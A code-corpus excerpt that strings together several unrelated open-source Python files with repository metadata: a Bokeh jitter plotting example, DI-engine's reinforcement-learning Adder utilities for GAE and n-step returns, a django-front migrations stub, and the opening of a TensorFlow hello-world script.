from bokeh.plotting import figure, show, output_file
from bokeh.sampledata.autompg import autompg
from bokeh.transform import jitter
years = sorted(autompg.yr.unique())
p1 = figure(plot_width=600, plot_height=300, title="Years vs mpg without jittering")
p1.xgrid.grid_line_color = None
p1.xaxis[0].ticker = years
p1.circle(x='yr', y='mpg', size=9, alpha=0.4, source=autompg)
p2 = figure(plot_width=600, plot_height=300, title="Years vs mpg with jittering")
p2.xgrid.grid_line_color = None
p2.xaxis[0].ticker = years
p2.circle(x=jitter('yr', 0.4), y='mpg', size=9, alpha=0.4, source=autompg)
output_file("jitter.html")
show(column(p1, p2))
| true
| true
|
1c40edab30a942e4d0f8d373e55273ab7795c9e2
| 10,867
|
py
|
Python
|
ding/rl_utils/adder.py
|
jayyoung0802/DI-engine
|
efbb35ddaf184d1009291e6842fbbae09f193492
|
[
"Apache-2.0"
] | null | null | null |
ding/rl_utils/adder.py
|
jayyoung0802/DI-engine
|
efbb35ddaf184d1009291e6842fbbae09f193492
|
[
"Apache-2.0"
] | null | null | null |
ding/rl_utils/adder.py
|
jayyoung0802/DI-engine
|
efbb35ddaf184d1009291e6842fbbae09f193492
|
[
"Apache-2.0"
] | null | null | null |
from typing import List, Dict, Any, Optional
from collections import deque
import copy
import torch
from ding.utils import list_split, lists_to_dicts
from .gae import gae, gae_data
class Adder(object):
"""
Overview:
Adder is a component that handles different transformations and calculations for transitions
in Collector Module(data generation and processing), such as GAE, n-step return, transition sampling etc.
Interface:
__init__, get_gae, get_gae_with_default_last_value, get_nstep_return_data, get_train_sample
"""
@classmethod
def get_gae(cls, data: List[Dict[str, Any]], last_value: torch.Tensor, gamma: float, gae_lambda: float,
cuda: bool) -> List[Dict[str, Any]]:
"""
Overview:
Get GAE advantage for stacked transitions(T timestep, 1 batch). Call ``gae`` for calculation.
Arguments:
- data (:obj:`list`): Transitions list, each element is a transition dict with at least ['value', 'reward']
- last_value (:obj:`torch.Tensor`): The last value(i.e.: the T+1 timestep)
- gamma (:obj:`float`): The future discount factor
- gae_lambda (:obj:`float`): GAE lambda parameter
- cuda (:obj:`bool`): Whether use cuda in GAE computation
Returns:
- data (:obj:`list`): transitions list like input one, but each element owns extra advantage key 'adv'
"""
value = torch.stack([d['value'] for d in data])
if last_value.shape[0] == 1:
next_value = torch.stack([d['value'] for d in data][1:] + [last_value])
else:
next_value = last_value # pass the whole next_value, not only the last value in the last timesteps
traj_flag = torch.stack([torch.tensor(int(d['traj_flag'])) for d in data])
reward = torch.stack([d['reward'] for d in data])
if cuda:
value = value.cuda()
next_value = next_value.cuda()
reward = reward.cuda()
if last_value.shape[0] == 1:
adv = gae(gae_data(value, next_value, reward, None, None), gamma, gae_lambda)
else:
# done is None, we distinguish if done according to the next_value,
# if next_value is zero, then it's real done, otherwise, it's not done
adv = gae(gae_data(value, next_value, reward, None, traj_flag), gamma, gae_lambda)
if cuda:
adv = adv.cpu()
for i in range(len(data)):
data[i]['adv'] = adv[i]
return data
@classmethod
def get_gae_with_default_last_value(cls, data: deque, done: bool, gamma: float, gae_lambda: float,
cuda: bool) -> List[Dict[str, Any]]:
"""
Overview:
Like ``get_gae`` above to get GAE advantage for stacked transitions. However, this function is designed in
case ``last_value`` is not passed. If transition is not done yet, it wouold assign last value in ``data``
as ``last_value``, discard the last element in ``data``(i.e. len(data) would decrease by 1), and then call
``get_gae``. Otherwise it would make ``last_value`` equal to 0.
Arguments:
- data (:obj:`deque`): Transitions list, each element is a transition dict with \
at least['value', 'reward']
- done (:obj:`bool`): Whether the transition reaches the end of an episode(i.e. whether the env is done)
- gamma (:obj:`float`): The future discount factor
- gae_lambda (:obj:`float`): GAE lambda parameter
- cuda (:obj:`bool`): Whether use cuda in GAE computation
Returns:
- data (:obj:`List[Dict[str, Any]]`): transitions list like input one, but each element owns \
extra advantage key 'adv'
"""
if done:
last_value = torch.zeros_like(data[-1]['value'])
else:
last_data = data.pop()
last_value = last_data['value']
return cls.get_gae(data, last_value, gamma, gae_lambda, cuda)
@classmethod
def get_nstep_return_data(
cls,
data: deque,
nstep: int,
cum_reward=False,
correct_terminate_gamma=True,
gamma=0.99,
) -> deque:
"""
Overview:
Process raw traj data by updating keys ['next_obs', 'reward', 'done'] in data's dict element.
Arguments:
- data (:obj:`deque`): Transitions list, each element is a transition dict
- nstep (:obj:`int`): Number of steps. If equals to 1, return ``data`` directly; \
Otherwise update with nstep value.
Returns:
- data (:obj:`deque`): Transitions list like input one, but each element updated with nstep value.
"""
if nstep == 1:
return data
fake_reward = torch.zeros(1)
next_obs_flag = 'next_obs' in data[0]
for i in range(len(data) - nstep):
# update keys ['next_obs', 'reward', 'done'] with their n-step value
if next_obs_flag:
data[i]['next_obs'] = data[i + nstep]['obs'] # do not need deepcopy
if cum_reward:
data[i]['reward'] = sum([data[i + j]['reward'] * (gamma ** j) for j in range(nstep)])
else:
data[i]['reward'] = torch.cat([data[i + j]['reward'] for j in range(nstep)])
data[i]['done'] = data[i + nstep - 1]['done']
if correct_terminate_gamma:
data[i]['value_gamma'] = gamma ** nstep
for i in range(max(0, len(data) - nstep), len(data)):
if next_obs_flag:
data[i]['next_obs'] = data[-1]['next_obs'] # do not need deepcopy
if cum_reward:
data[i]['reward'] = sum([data[i + j]['reward'] * (gamma ** j) for j in range(len(data) - i)])
else:
data[i]['reward'] = torch.cat(
[data[i + j]['reward']
for j in range(len(data) - i)] + [fake_reward for _ in range(nstep - (len(data) - i))]
)
data[i]['done'] = data[-1]['done']
if correct_terminate_gamma:
data[i]['value_gamma'] = gamma ** (len(data) - i - 1)
return data
@classmethod
def get_train_sample(
cls,
data: List[Dict[str, Any]],
unroll_len: int,
last_fn_type: str = 'last',
null_transition: Optional[dict] = None
) -> List[Dict[str, Any]]:
"""
Overview:
Process raw traj data by updating keys ['next_obs', 'reward', 'done'] in data's dict element.
If ``unroll_len`` equals to 1, which means no process is needed, can directly return ``data``.
Otherwise, ``data`` will be splitted according to ``unroll_len``, process residual part according to
``last_fn_type`` and call ``lists_to_dicts`` to form sampled training data.
Arguments:
- data (:obj:`List[Dict[str, Any]]`): Transitions list, each element is a transition dict
- unroll_len (:obj:`int`): Learn training unroll length
- last_fn_type (:obj:`str`): The method type name for dealing with last residual data in a traj \
after splitting, should be in ['last', 'drop', 'null_padding']
- null_transition (:obj:`Optional[dict]`): Dict type null transition, used in ``null_padding``
Returns:
- data (:obj:`List[Dict[str, Any]]`): Transitions list processed after unrolling
"""
if unroll_len == 1:
return data
else:
# cut data into pieces whose length is unroll_len
split_data, residual = list_split(data, step=unroll_len)
def null_padding():
template = copy.deepcopy(residual[0])
template['null'] = True
if isinstance(template['obs'], dict):
template['obs'] = {k: torch.zeros_like(v) for k, v in template['obs'].items()}
else:
template['obs'] = torch.zeros_like(template['obs'])
# template['action'] = -1 * torch.ones_like(template['action']) # TODO(pu)
template['action'] = torch.zeros_like(template['action'])
template['done'] = True
template['reward'] = torch.zeros_like(template['reward'])
if 'value_gamma' in template:
template['value_gamma'] = 0.
null_data = [cls._get_null_transition(template, null_transition) for _ in range(miss_num)]
return null_data
if residual is not None:
miss_num = unroll_len - len(residual)
if last_fn_type == 'drop':
# drop the residual part
pass
elif last_fn_type == 'last':
if len(split_data) > 0:
# copy last datas from split_data's last element, and insert in front of residual
last_data = copy.deepcopy(split_data[-1][-miss_num:])
split_data.append(last_data + residual)
else:
# get null transitions using ``null_padding``, and insert behind residual
null_data = null_padding()
split_data.append(residual + null_data)
elif last_fn_type == 'null_padding':
# same to the case of 'last' type and split_data is empty
null_data = null_padding()
split_data.append(residual + null_data)
# collate unroll_len dicts according to keys
if len(split_data) > 0:
split_data = [lists_to_dicts(d, recursive=True) for d in split_data]
return split_data
@classmethod
def _get_null_transition(cls, template: dict, null_transition: Optional[dict] = None) -> dict:
"""
Overview:
Get null transition for padding. If ``cls._null_transition`` is None, return input ``template`` instead.
Arguments:
- template (:obj:`dict`): The template for null transition.
- null_transition (:obj:`Optional[dict]`): Dict type null transition, used in ``null_padding``
Returns:
- null_transition (:obj:`dict`): The deepcopied null transition.
"""
if null_transition is not None:
return copy.deepcopy(null_transition)
else:
return copy.deepcopy(template)
get_gae = Adder.get_gae
get_gae_with_default_last_value = Adder.get_gae_with_default_last_value
get_nstep_return_data = Adder.get_nstep_return_data
get_train_sample = Adder.get_train_sample
| 48.95045
| 119
| 0.570167
|
from typing import List, Dict, Any, Optional
from collections import deque
import copy
import torch
from ding.utils import list_split, lists_to_dicts
from .gae import gae, gae_data
class Adder(object):
@classmethod
def get_gae(cls, data: List[Dict[str, Any]], last_value: torch.Tensor, gamma: float, gae_lambda: float,
cuda: bool) -> List[Dict[str, Any]]:
value = torch.stack([d['value'] for d in data])
if last_value.shape[0] == 1:
next_value = torch.stack([d['value'] for d in data][1:] + [last_value])
else:
next_value = last_value
traj_flag = torch.stack([torch.tensor(int(d['traj_flag'])) for d in data])
reward = torch.stack([d['reward'] for d in data])
if cuda:
value = value.cuda()
next_value = next_value.cuda()
reward = reward.cuda()
if last_value.shape[0] == 1:
adv = gae(gae_data(value, next_value, reward, None, None), gamma, gae_lambda)
else:
adv = gae(gae_data(value, next_value, reward, None, traj_flag), gamma, gae_lambda)
if cuda:
adv = adv.cpu()
for i in range(len(data)):
data[i]['adv'] = adv[i]
return data
@classmethod
def get_gae_with_default_last_value(cls, data: deque, done: bool, gamma: float, gae_lambda: float,
cuda: bool) -> List[Dict[str, Any]]:
if done:
last_value = torch.zeros_like(data[-1]['value'])
else:
last_data = data.pop()
last_value = last_data['value']
return cls.get_gae(data, last_value, gamma, gae_lambda, cuda)
@classmethod
def get_nstep_return_data(
cls,
data: deque,
nstep: int,
cum_reward=False,
correct_terminate_gamma=True,
gamma=0.99,
) -> deque:
if nstep == 1:
return data
fake_reward = torch.zeros(1)
next_obs_flag = 'next_obs' in data[0]
for i in range(len(data) - nstep):
if next_obs_flag:
data[i]['next_obs'] = data[i + nstep]['obs']
if cum_reward:
data[i]['reward'] = sum([data[i + j]['reward'] * (gamma ** j) for j in range(nstep)])
else:
data[i]['reward'] = torch.cat([data[i + j]['reward'] for j in range(nstep)])
data[i]['done'] = data[i + nstep - 1]['done']
if correct_terminate_gamma:
data[i]['value_gamma'] = gamma ** nstep
for i in range(max(0, len(data) - nstep), len(data)):
if next_obs_flag:
data[i]['next_obs'] = data[-1]['next_obs']
if cum_reward:
data[i]['reward'] = sum([data[i + j]['reward'] * (gamma ** j) for j in range(len(data) - i)])
else:
data[i]['reward'] = torch.cat(
[data[i + j]['reward']
for j in range(len(data) - i)] + [fake_reward for _ in range(nstep - (len(data) - i))]
)
data[i]['done'] = data[-1]['done']
if correct_terminate_gamma:
data[i]['value_gamma'] = gamma ** (len(data) - i - 1)
return data
@classmethod
def get_train_sample(
cls,
data: List[Dict[str, Any]],
unroll_len: int,
last_fn_type: str = 'last',
null_transition: Optional[dict] = None
) -> List[Dict[str, Any]]:
if unroll_len == 1:
return data
else:
split_data, residual = list_split(data, step=unroll_len)
def null_padding():
template = copy.deepcopy(residual[0])
template['null'] = True
if isinstance(template['obs'], dict):
template['obs'] = {k: torch.zeros_like(v) for k, v in template['obs'].items()}
else:
template['obs'] = torch.zeros_like(template['obs'])
template['action'] = torch.zeros_like(template['action'])
template['done'] = True
template['reward'] = torch.zeros_like(template['reward'])
if 'value_gamma' in template:
template['value_gamma'] = 0.
null_data = [cls._get_null_transition(template, null_transition) for _ in range(miss_num)]
return null_data
if residual is not None:
miss_num = unroll_len - len(residual)
if last_fn_type == 'drop':
pass
elif last_fn_type == 'last':
if len(split_data) > 0:
last_data = copy.deepcopy(split_data[-1][-miss_num:])
split_data.append(last_data + residual)
else:
# get null transitions using ``null_padding``, and insert behind residual
null_data = null_padding()
split_data.append(residual + null_data)
elif last_fn_type == 'null_padding':
# same to the case of 'last' type and split_data is empty
null_data = null_padding()
split_data.append(residual + null_data)
# collate unroll_len dicts according to keys
if len(split_data) > 0:
split_data = [lists_to_dicts(d, recursive=True) for d in split_data]
return split_data
@classmethod
def _get_null_transition(cls, template: dict, null_transition: Optional[dict] = None) -> dict:
if null_transition is not None:
return copy.deepcopy(null_transition)
else:
return copy.deepcopy(template)
get_gae = Adder.get_gae
get_gae_with_default_last_value = Adder.get_gae_with_default_last_value
get_nstep_return_data = Adder.get_nstep_return_data
get_train_sample = Adder.get_train_sample
| true
| true
|
1c40ee00c39d0b6c3a52855b04fcd56ef6764b7a
| 598
|
py
|
Python
|
front/migrations/__init__.py
|
llazzaro/django-front
|
8a04a88d42b37f4882ab43415e5f20bedae9d257
|
[
"MIT"
] | 135
|
2015-01-12T22:21:41.000Z
|
2021-12-12T03:52:04.000Z
|
front/migrations/__init__.py
|
P-Designs/django-front
|
2f7daaa70d6b2210f4a4ad0c251b0893f15bd711
|
[
"MIT"
] | 12
|
2015-04-10T12:45:04.000Z
|
2020-03-22T17:32:32.000Z
|
front/migrations/__init__.py
|
P-Designs/django-front
|
2f7daaa70d6b2210f4a4ad0c251b0893f15bd711
|
[
"MIT"
] | 24
|
2015-01-24T01:22:18.000Z
|
2022-03-15T13:06:47.000Z
|
"""
Django migrations for django-front app
This package does not contain South migrations. South migrations can be found
in the ``south_migrations`` package.
"""
SOUTH_ERROR_MESSAGE = """\n
For South support, customize the SOUTH_MIGRATION_MODULES setting like so:
SOUTH_MIGRATION_MODULES = {
'front': 'front.south_migrations',
}
"""
# Ensure the user is not using Django 1.6 or below with South
try:
from django.db import migrations # noqa
except ImportError:
from django.core.exceptions import ImproperlyConfigured
raise ImproperlyConfigured(SOUTH_ERROR_MESSAGE)
| 27.181818
| 78
| 0.754181
|
SOUTH_ERROR_MESSAGE = """\n
For South support, customize the SOUTH_MIGRATION_MODULES setting like so:
SOUTH_MIGRATION_MODULES = {
'front': 'front.south_migrations',
}
"""
try:
from django.db import migrations
except ImportError:
from django.core.exceptions import ImproperlyConfigured
raise ImproperlyConfigured(SOUTH_ERROR_MESSAGE)
| true
| true
|
1c40eee28f9b90e96355b7775b84c6b9d38efa2a
| 401
|
py
|
Python
|
modules/execute_attack.py
|
mica-framework/cli
|
a5a851a73d7b9bd0431e9c8bb0c8fca401b32ccf
|
[
"MIT"
] | 5
|
2019-06-14T12:32:56.000Z
|
2022-03-17T20:55:48.000Z
|
modules/execute_attack.py
|
mica-framework/cli
|
a5a851a73d7b9bd0431e9c8bb0c8fca401b32ccf
|
[
"MIT"
] | null | null | null |
modules/execute_attack.py
|
mica-framework/cli
|
a5a851a73d7b9bd0431e9c8bb0c8fca401b32ccf
|
[
"MIT"
] | null | null | null |
import server
from core import SessionStorage
def execute(*args):
# get the session storage
sessionStorage = args[0]
# get the attack information
attack_type = sessionStorage.get_value('list_attacks')
victims = sessionStorage.get_value('list_victims')
# execute the attack
server.run_attack(attack_type, victims)
# finalize the method by return True
return True
| 25.0625
| 58
| 0.730673
|
import server
from core import SessionStorage
def execute(*args):
sessionStorage = args[0]
attack_type = sessionStorage.get_value('list_attacks')
victims = sessionStorage.get_value('list_victims')
server.run_attack(attack_type, victims)
return True
| true
| true
|
1c40ef47ff46714cf9f138acd5d81098e95454ef
| 407
|
py
|
Python
|
Django-habits-reminder/Django-habits-reminder/users/migrations/0002_profile_image.py
|
KrystianKlik/Django-habits-reminder
|
915e802aea87cbc48ae07c98701285379423cdf6
|
[
"MIT"
] | null | null | null |
Django-habits-reminder/Django-habits-reminder/users/migrations/0002_profile_image.py
|
KrystianKlik/Django-habits-reminder
|
915e802aea87cbc48ae07c98701285379423cdf6
|
[
"MIT"
] | 8
|
2021-03-19T08:39:55.000Z
|
2022-02-10T10:14:40.000Z
|
Django-habits-reminder/Django-habits-reminder/users/migrations/0002_profile_image.py
|
KrystianKlik/Django-habits-reminder
|
915e802aea87cbc48ae07c98701285379423cdf6
|
[
"MIT"
] | null | null | null |
# Generated by Django 2.2.10 on 2020-02-24 08:48
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('users', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='profile',
name='image',
field=models.ImageField(default='default.jpg', upload_to='profile_pics'),
),
]
| 21.421053
| 85
| 0.599509
|
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('users', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='profile',
name='image',
field=models.ImageField(default='default.jpg', upload_to='profile_pics'),
),
]
| true
| true
|
1c40f0d17df2d8045314b3bb535d6a2b05d9e18a
| 9,091
|
py
|
Python
|
common/utils_yml.py
|
linxichong/pyautotest
|
ca9483b00bdccaa9e7467e49cf4a1768b59cce26
|
[
"MIT"
] | null | null | null |
common/utils_yml.py
|
linxichong/pyautotest
|
ca9483b00bdccaa9e7467e49cf4a1768b59cce26
|
[
"MIT"
] | 4
|
2021-06-03T07:43:09.000Z
|
2022-03-12T00:48:44.000Z
|
common/utils_yml.py
|
linxichong/pyautotest
|
ca9483b00bdccaa9e7467e49cf4a1768b59cce26
|
[
"MIT"
] | null | null | null |
from selenium import webdriver
from selenium.webdriver.support.ui import Select
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
import os
import json
import time
from selenium.webdriver.common.alert import Alert
from common.enum import BrowserType, FlowNodeType, FlowNodeProp, Messages
import pyperclip
from types import MethodType, FunctionType
import copy
import random
from common.common import get_item, handle_option_yml, read_flowdata, recursive_set_data, handle_click, get_element_by_flow, open_file, repalce_dynamic_val, set_element_val, repalce_const_val, handle_option, get_elements_by_flow
from common import logger, const
from common.decorator import logit, doprocess, lognode
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.action_chains import ActionChains
import csv
from webdriver_manager.chrome import ChromeDriverManager
# # 创建浏览器启动实例
# def create_driver(browser, useproxy):
# # ie
# if browser == BrowserType.IE.value:
# driver = webdriver.Ie(executable_path=r"./drivers/IEDriverServer.exe")
# # chrome
# elif browser == BrowserType.Chrome.value:
# chrome_options = webdriver.ChromeOptions()
# # PROXY = '113.121.77.137:9999'
# # # PROXY_AUTH = '{userid}:{password}'
# # chrome_options.add_argument('--proxy-server=http://%s' % PROXY)
# # option.add_argument('--proxy-auth=%s' % PROXY_AUTH)
# # 取消显示DevTools listening on ws://127.0.0.1...提示
# chrome_options.add_experimental_option('excludeSwitches', ['enable-logging'])
# # 是否加载代理
# if useproxy:
# chrome_options.add_extension("proxy.zip")
# driver = webdriver.Chrome(
# executable_path=r"./drivers/chromedriver.exe",
# chrome_options=chrome_options)
# return driver
def get_flow_items(flowdata_path):
flows = {}
for root, dirs, files in os.walk(flowdata_path, topdown=False):
if 'hidden' in root:
continue
for name in files:
if name.startswith('cmn_'):
continue
flows[name] = os.path.join(root, name)
return flows
def exec_flowdata(driver, filename, path):
try:
logger.info(Messages.Start_Flow % filename)
read_flowdata(driver, path, exec_flow_node)
logger.info(Messages.End_Flow % filename)
except Exception as e:
logger.error(Messages.Flow_Handle_Failed % e)
@lognode
@doprocess
def exec_flow_node(driver, type, flowdata):
if flowdata:
# 流程-打开目标网址
if type == FlowNodeType.Open.value:
param = flowdata.get(FlowNodeProp.Params.value)
if param:
target_url = param
else:
# 获取目标网站网址
target_url = get_item(flowdata, FlowNodeProp.TargetURL.value)
# 如果存在常量值执行替换
target_url = const.get_const_val(target_url)
driver.get(target_url)
# 流程-处理读取数据文件
elif type == FlowNodeType.Read.value:
# 读取方式
findmethod = get_item(flowdata, FlowNodeProp.FindMethod.value)
# 读取文件路径
target_url = get_item(flowdata, FlowNodeProp.TargetURL.value)
# 读取数据文件
with open(target_url, encoding='utf-8') as f:
mock_data = json.load(f)
# 根据数据文件,页面自动赋值
if mock_data:
# 获取常量值
mock_data = const.repalce_const_val(mock_data)
recursive_set_data(driver, By.__dict__[findmethod], mock_data)
# 流程-处理单击
elif type == FlowNodeType.Click.value or type == FlowNodeType.DbClick.value:
handle_click(driver, flowdata, type)
# 流程-处理弹出框
elif type == FlowNodeType.Alert.value:
# 等待弹出框出现
wait = WebDriverWait(driver, 10)
wait.until(EC.alert_is_present())
# 获取弹出框
alert = driver.switch_to.alert
# 弹出框确认(默认执行弹出框确认操作)
alert.accept()
# 流程-剪切板操作(复制)
elif type == FlowNodeType.Copy.value:
if flowdata.get(FlowNodeProp.FindMethod.value) != None:
# 获取目标元素
element = get_element_by_flow(driver, flowdata)
if element.text:
copy_val = element.text
elif element.get_attribute('value'):
copy_val = element.get_attribute('value')
else:
# 如果存在常量值优先替换
flowdata = repalce_const_val(flowdata)
flowdata = repalce_dynamic_val(flowdata)
copy_val = get_item(flowdata, FlowNodeProp.ItemVal.value)
# 复制到ClipBoard
pyperclip.copy(copy_val)
# 流程-剪切板操作(粘贴)
elif type == FlowNodeType.Paste.value:
# 获取目标元素
element = get_element_by_flow(driver, flowdata)
# 复制到ClipBoard
setval = pyperclip.paste()
if setval:
element.clear()
# 首选使用常量值
val = const.get_const_val(setval)
element.send_keys(val)
# 流程-添加缓存值
elif type == FlowNodeType.Cache.value:
# 获取想要设置的缓存值
val = get_item(flowdata, FlowNodeProp.ItemVal.value)
if isinstance(val, str):
# 首选使用常量值
val = const.get_const_val(val)
setval = val
elif isinstance(val, object):
setval = json.dumps(val)
# 获取缓存键
cachekey = get_item(flowdata, FlowNodeProp.CacheKey.value)
# 添加浏览器缓存
driver.add_cookie({'name': cachekey, 'value': setval})
# 流程-画面要素設定
elif type == FlowNodeType.SetVal.value:
# 如果存在常量值优先替换
flowdata = repalce_const_val(flowdata)
# 获取动态生成的项目設定値
flowdata = repalce_dynamic_val(flowdata)
# 目标元素
target = get_item(flowdata, FlowNodeProp.Target.value)
# 获取目标元素方式
findmethod = get_item(flowdata, FlowNodeProp.FindMethod.value)
# 获取动态生成的项目設定値
itemval = get_item(flowdata, FlowNodeProp.ItemVal.value)
# 指定元素设置缓存值
set_element_val(driver, By.__dict__[findmethod], itemval, target)
# 流程-循环操作
elif type == FlowNodeType.For.value:
# 子操作流程节点集合
child_flows = get_item(flowdata, FlowNodeProp.Flow.value)
if FlowNodeProp.StartIdx.value in flowdata and FlowNodeProp.EndIdx.value in flowdata:
# 开始索引
startIdx = get_item(flowdata, FlowNodeProp.StartIdx.value)
# 结束索引
endIdx = get_item(flowdata, FlowNodeProp.EndIdx.value)
# 循环指定索引范围
for idx in range(int(startIdx), int(endIdx) + 1):
handle_for_childflow(driver, child_flows, idx)
elif FlowNodeProp.TargetURL.value in flowdata:
# 读取文件路径
target_url = get_item(flowdata, FlowNodeProp.TargetURL.value)
with open(target_url) as csvfile:
for row in csv.reader(csvfile):
handle_for_childflow(driver, child_flows, row[0])
else:
# 获取目标元素列表
elements = get_elements_by_flow(driver, flowdata)
# 循环处理元素列表
for element in elements:
handle_for_childflow(driver, child_flows, element)
# 流程-加载既存流程文件
elif type == FlowNodeType.FlowFile.value:
# 读取文件路径
file_url = get_item(flowdata, FlowNodeProp.TargetURL.value)
param = flowdata.get(FlowNodeProp.Params.value)
read_flowdata(driver, file_url, exec_flow_node, param)
# 流程-鼠标键盘操作
elif type == FlowNodeType.KeyBoard.value:
# 读取鼠标键盘操作
itemval = get_item(flowdata, FlowNodeProp.ItemVal.value)
# 获取操作次数
count = flowdata.get(FlowNodeProp.Count.value, 1)
source = None
if FlowNodeProp.Target.value in flowdata and FlowNodeProp.FindMethod.value in flowdata:
# 读取指定元素
source = get_element_by_flow(driver, flowdata)
else:
source = driver
for i in range(count):
source.send_keys(Keys.__dict__[itemval])
# ActionChains(source).send_keys(Keys.__dict__[itemval]).perform()
# 获取节点可选操作配置
option = flowdata.get(FlowNodeProp.Option.value)
if option:
# 处理可选操作
handle_option_yml(driver, option)
""" 处理循环中的子节点 """
def handle_for_childflow(driver, child_flows, params):
# 处理子流程节点
for flow in child_flows:
# 原始流程节点
source_childflow = child_flows[flow]
# 浅拷贝临时流程节点
temp_childflow = copy.copy(source_childflow)
temp_childflow[FlowNodeProp.Params.value] = params
# 处理子流程节点
exec_flow_node(driver, flow, temp_childflow)
| 40.225664
| 228
| 0.605104
|
from selenium import webdriver
from selenium.webdriver.support.ui import Select
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
import os
import json
import time
from selenium.webdriver.common.alert import Alert
from common.enum import BrowserType, FlowNodeType, FlowNodeProp, Messages
import pyperclip
from types import MethodType, FunctionType
import copy
import random
from common.common import get_item, handle_option_yml, read_flowdata, recursive_set_data, handle_click, get_element_by_flow, open_file, repalce_dynamic_val, set_element_val, repalce_const_val, handle_option, get_elements_by_flow
from common import logger, const
from common.decorator import logit, doprocess, lognode
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.action_chains import ActionChains
import csv
from webdriver_manager.chrome import ChromeDriverManager
[name] = os.path.join(root, name)
return flows
def exec_flowdata(driver, filename, path):
try:
logger.info(Messages.Start_Flow % filename)
read_flowdata(driver, path, exec_flow_node)
logger.info(Messages.End_Flow % filename)
except Exception as e:
logger.error(Messages.Flow_Handle_Failed % e)
@lognode
@doprocess
def exec_flow_node(driver, type, flowdata):
if flowdata:
if type == FlowNodeType.Open.value:
param = flowdata.get(FlowNodeProp.Params.value)
if param:
target_url = param
else:
target_url = get_item(flowdata, FlowNodeProp.TargetURL.value)
target_url = const.get_const_val(target_url)
driver.get(target_url)
elif type == FlowNodeType.Read.value:
findmethod = get_item(flowdata, FlowNodeProp.FindMethod.value)
target_url = get_item(flowdata, FlowNodeProp.TargetURL.value)
with open(target_url, encoding='utf-8') as f:
mock_data = json.load(f)
if mock_data:
mock_data = const.repalce_const_val(mock_data)
recursive_set_data(driver, By.__dict__[findmethod], mock_data)
elif type == FlowNodeType.Click.value or type == FlowNodeType.DbClick.value:
handle_click(driver, flowdata, type)
elif type == FlowNodeType.Alert.value:
wait = WebDriverWait(driver, 10)
wait.until(EC.alert_is_present())
alert = driver.switch_to.alert
alert.accept()
elif type == FlowNodeType.Copy.value:
if flowdata.get(FlowNodeProp.FindMethod.value) != None:
element = get_element_by_flow(driver, flowdata)
if element.text:
copy_val = element.text
elif element.get_attribute('value'):
copy_val = element.get_attribute('value')
else:
flowdata = repalce_const_val(flowdata)
flowdata = repalce_dynamic_val(flowdata)
copy_val = get_item(flowdata, FlowNodeProp.ItemVal.value)
pyperclip.copy(copy_val)
elif type == FlowNodeType.Paste.value:
element = get_element_by_flow(driver, flowdata)
setval = pyperclip.paste()
if setval:
element.clear()
val = const.get_const_val(setval)
element.send_keys(val)
elif type == FlowNodeType.Cache.value:
val = get_item(flowdata, FlowNodeProp.ItemVal.value)
if isinstance(val, str):
val = const.get_const_val(val)
setval = val
elif isinstance(val, object):
setval = json.dumps(val)
cachekey = get_item(flowdata, FlowNodeProp.CacheKey.value)
driver.add_cookie({'name': cachekey, 'value': setval})
elif type == FlowNodeType.SetVal.value:
flowdata = repalce_const_val(flowdata)
flowdata = repalce_dynamic_val(flowdata)
target = get_item(flowdata, FlowNodeProp.Target.value)
findmethod = get_item(flowdata, FlowNodeProp.FindMethod.value)
itemval = get_item(flowdata, FlowNodeProp.ItemVal.value)
set_element_val(driver, By.__dict__[findmethod], itemval, target)
elif type == FlowNodeType.For.value:
child_flows = get_item(flowdata, FlowNodeProp.Flow.value)
if FlowNodeProp.StartIdx.value in flowdata and FlowNodeProp.EndIdx.value in flowdata:
startIdx = get_item(flowdata, FlowNodeProp.StartIdx.value)
endIdx = get_item(flowdata, FlowNodeProp.EndIdx.value)
for idx in range(int(startIdx), int(endIdx) + 1):
handle_for_childflow(driver, child_flows, idx)
elif FlowNodeProp.TargetURL.value in flowdata:
target_url = get_item(flowdata, FlowNodeProp.TargetURL.value)
with open(target_url) as csvfile:
for row in csv.reader(csvfile):
handle_for_childflow(driver, child_flows, row[0])
else:
elements = get_elements_by_flow(driver, flowdata)
for element in elements:
handle_for_childflow(driver, child_flows, element)
elif type == FlowNodeType.FlowFile.value:
file_url = get_item(flowdata, FlowNodeProp.TargetURL.value)
param = flowdata.get(FlowNodeProp.Params.value)
read_flowdata(driver, file_url, exec_flow_node, param)
elif type == FlowNodeType.KeyBoard.value:
itemval = get_item(flowdata, FlowNodeProp.ItemVal.value)
count = flowdata.get(FlowNodeProp.Count.value, 1)
source = None
if FlowNodeProp.Target.value in flowdata and FlowNodeProp.FindMethod.value in flowdata:
source = get_element_by_flow(driver, flowdata)
else:
source = driver
for i in range(count):
source.send_keys(Keys.__dict__[itemval])
option = flowdata.get(FlowNodeProp.Option.value)
if option:
handle_option_yml(driver, option)
def handle_for_childflow(driver, child_flows, params):
for flow in child_flows:
source_childflow = child_flows[flow]
temp_childflow = copy.copy(source_childflow)
temp_childflow[FlowNodeProp.Params.value] = params
exec_flow_node(driver, flow, temp_childflow)
| true
| true
|
1c40f315bb2de5005ee660d0aceb624424c052f9
| 522
|
py
|
Python
|
examples/1_Introduction/helloworld.py
|
kar-thik/TensorFlow-Examples
|
2097ad0a6faf55a4a9cee00cc1b0ae3454b178fc
|
[
"MIT"
] | 23
|
2017-07-07T07:00:52.000Z
|
2022-03-09T06:49:17.000Z
|
examples/1_Introduction/helloworld.py
|
kar-thik/TensorFlow-Examples
|
2097ad0a6faf55a4a9cee00cc1b0ae3454b178fc
|
[
"MIT"
] | 1
|
2020-01-07T06:27:59.000Z
|
2020-04-04T17:06:05.000Z
|
examples/1_Introduction/helloworld.py
|
kar-thik/TensorFlow-Examples
|
2097ad0a6faf55a4a9cee00cc1b0ae3454b178fc
|
[
"MIT"
] | 26
|
2017-06-13T01:44:24.000Z
|
2021-06-17T18:11:26.000Z
|
'''
HelloWorld example using TensorFlow library.
Author: Aymeric Damien
Project: https://github.com/aymericdamien/TensorFlow-Examples/
'''
from __future__ import print_function
import tensorflow as tf
# Simple hello world using TensorFlow
# Create a Constant op
